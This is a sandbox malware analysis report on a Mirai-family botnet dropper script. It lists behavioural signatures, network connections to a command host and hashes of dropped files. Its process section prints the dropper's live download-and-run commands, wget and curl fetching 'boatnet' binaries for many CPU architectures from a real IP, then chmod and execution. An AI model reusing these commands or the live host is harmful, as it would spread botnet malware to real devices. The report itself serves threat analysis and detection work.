Malware Analysis Report

2024-11-13 17:59

Sample ID 241109-etyt7sxdrg
Target ohshit.sh
SHA256 5b35f387f69bcb231b7e339c9ddeb610fd73ebf848f8cefdcfb26a2faabc5c6f
Tags
mirai lzrd botnet defense_evasion discovery upx antivm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5b35f387f69bcb231b7e339c9ddeb610fd73ebf848f8cefdcfb26a2faabc5c6f

Threat Level: Known bad

The file ohshit.sh was found to be: Known bad.

Malicious Activity Summary

mirai lzrd botnet defense_evasion discovery upx antivm

Mirai

Mirai family

Modifies Watchdog functionality

Executes dropped EXE

File and Directory Permissions Modification

Writes file to system bin folder

Enumerates running processes

UPX packed file

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 04:14

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 04:14

Reported

2024-11-09 04:17

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

148s

Max time network

149s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A

Enumerates running processes

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1595/cmdline /tmp/WTF N/A
File opened for reading /proc/666/cmdline /tmp/WTF N/A
File opened for reading /proc/1157/cmdline /tmp/WTF N/A
File opened for reading /proc/1162/cmdline /tmp/WTF N/A
File opened for reading /proc/1569/cmdline /tmp/WTF N/A
File opened for reading /proc/1262/cmdline /tmp/WTF N/A
File opened for reading /proc/513/cmdline /tmp/WTF N/A
File opened for reading /proc/1579/cmdline /tmp/WTF N/A
File opened for reading /proc/543/cmdline /tmp/WTF N/A
File opened for reading /proc/666/cmdline /tmp/WTF N/A
File opened for reading /proc/1209/cmdline /tmp/WTF N/A
File opened for reading /proc/1364/cmdline /tmp/WTF N/A
File opened for reading /proc/462/cmdline /tmp/WTF N/A
File opened for reading /proc/1153/cmdline /tmp/WTF N/A
File opened for reading /proc/1116/cmdline /tmp/WTF N/A
File opened for reading /proc/461/cmdline /tmp/WTF N/A
File opened for reading /proc/599/cmdline /tmp/WTF N/A
File opened for reading /proc/1116/cmdline /tmp/WTF N/A
File opened for reading /proc/1216/cmdline /tmp/WTF N/A
File opened for reading /proc/1593/cmdline /tmp/WTF N/A
File opened for reading /proc/749/cmdline /tmp/WTF N/A
File opened for reading /proc/1334/cmdline /tmp/WTF N/A
File opened for reading /proc/1561/cmdline /tmp/WTF N/A
File opened for reading /proc/1585/cmdline /tmp/WTF N/A
File opened for reading /proc/1401/cmdline /tmp/WTF N/A
File opened for reading /proc/1555/cmdline /tmp/WTF N/A
File opened for reading /proc/729/cmdline /tmp/WTF N/A
File opened for reading /proc/1079/cmdline /tmp/WTF N/A
File opened for reading /proc/1498/cmdline /tmp/WTF N/A
File opened for reading /proc/1045/cmdline /tmp/WTF N/A
File opened for reading /proc/1089/cmdline /tmp/WTF N/A
File opened for reading /proc/669/cmdline /tmp/WTF N/A
File opened for reading /proc/1530/cmdline /tmp/WTF N/A
File opened for reading /proc/544/cmdline /tmp/WTF N/A
File opened for reading /proc/1065/cmdline /tmp/WTF N/A
File opened for reading /proc/1107/cmdline /tmp/WTF N/A
File opened for reading /proc/1498/cmdline /tmp/WTF N/A
File opened for reading /proc/1683/cmdline /tmp/WTF N/A
File opened for reading /proc/1190/cmdline /tmp/WTF N/A
File opened for reading /proc/1083/cmdline /tmp/WTF N/A
File opened for reading /proc/1086/cmdline /tmp/WTF N/A
File opened for reading /proc/1306/cmdline /tmp/WTF N/A
File opened for reading /proc/447/cmdline /tmp/WTF N/A
File opened for reading /proc/463/cmdline /tmp/WTF N/A
File opened for reading /proc/1571/cmdline /tmp/WTF N/A
File opened for reading /proc/1035/cmdline /tmp/WTF N/A
File opened for reading /proc/1280/cmdline /tmp/WTF N/A
File opened for reading /proc/1065/cmdline /tmp/WTF N/A
File opened for reading /proc/1190/cmdline /tmp/WTF N/A
File opened for reading /proc/1364/cmdline /tmp/WTF N/A
File opened for reading /proc/975/cmdline /tmp/WTF N/A
File opened for reading /proc/1096/cmdline /tmp/WTF N/A
File opened for reading /proc/761/cmdline /tmp/WTF N/A
File opened for reading /proc/1166/cmdline /tmp/WTF N/A
File opened for reading /proc/1187/cmdline /tmp/WTF N/A
File opened for reading /proc/1553/cmdline /tmp/WTF N/A
File opened for reading /proc/666/cmdline /tmp/WTF N/A
File opened for reading /proc/980/cmdline /tmp/WTF N/A
File opened for reading /proc/1547/cmdline /tmp/WTF N/A
File opened for reading /proc/580/cmdline /tmp/WTF N/A
File opened for reading /proc/1661/cmdline /tmp/WTF N/A
File opened for reading /proc/1603/cmdline /tmp/WTF N/A
File opened for reading /proc/1498/cmdline /tmp/WTF N/A
File opened for reading /proc/1563/cmdline /tmp/WTF N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.mpsl /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm /usr/bin/curl N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/wget N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]

/bin/chmod

[chmod +x boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]

/bin/chmod

[chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-mAhB1J systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-EdkoHW systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
GB 77.221.151.63:80 77.221.151.63 tcp
N/A 224.0.0.251:5353 udp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 195.181.164.14:443 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp

Files

/tmp/boatnet.x86

MD5 895badd48eed0c0e0ba14e8d5967e7bb
SHA1 3c4c22665e6197841f7e68f941a4a27dca3d4d8d
SHA256 e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4
SHA512 dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7

memory/1536-1-0x0000000008048000-0x00000000080547a0-memory.dmp

memory/1544-2-0x0000000008048000-0x00000000080547a0-memory.dmp

memory/1552-3-0x0000000008048000-0x00000000080547a0-memory.dmp

memory/1560-4-0x0000000008048000-0x00000000080547a0-memory.dmp

memory/1568-5-0x0000000008048000-0x00000000080547a0-memory.dmp

memory/1576-6-0x0000000008048000-0x00000000080547a0-memory.dmp

memory/1584-7-0x0000000008048000-0x00000000080547a0-memory.dmp

memory/1592-8-0x0000000008048000-0x00000000080547a0-memory.dmp

memory/1600-9-0x0000000008048000-0x00000000080547a0-memory.dmp

memory/1608-10-0x0000000008048000-0x00000000080547a0-memory.dmp

memory/1622-11-0x0000000008048000-0x00000000080547a0-memory.dmp

memory/1632-12-0x0000000008048000-0x00000000080547a0-memory.dmp

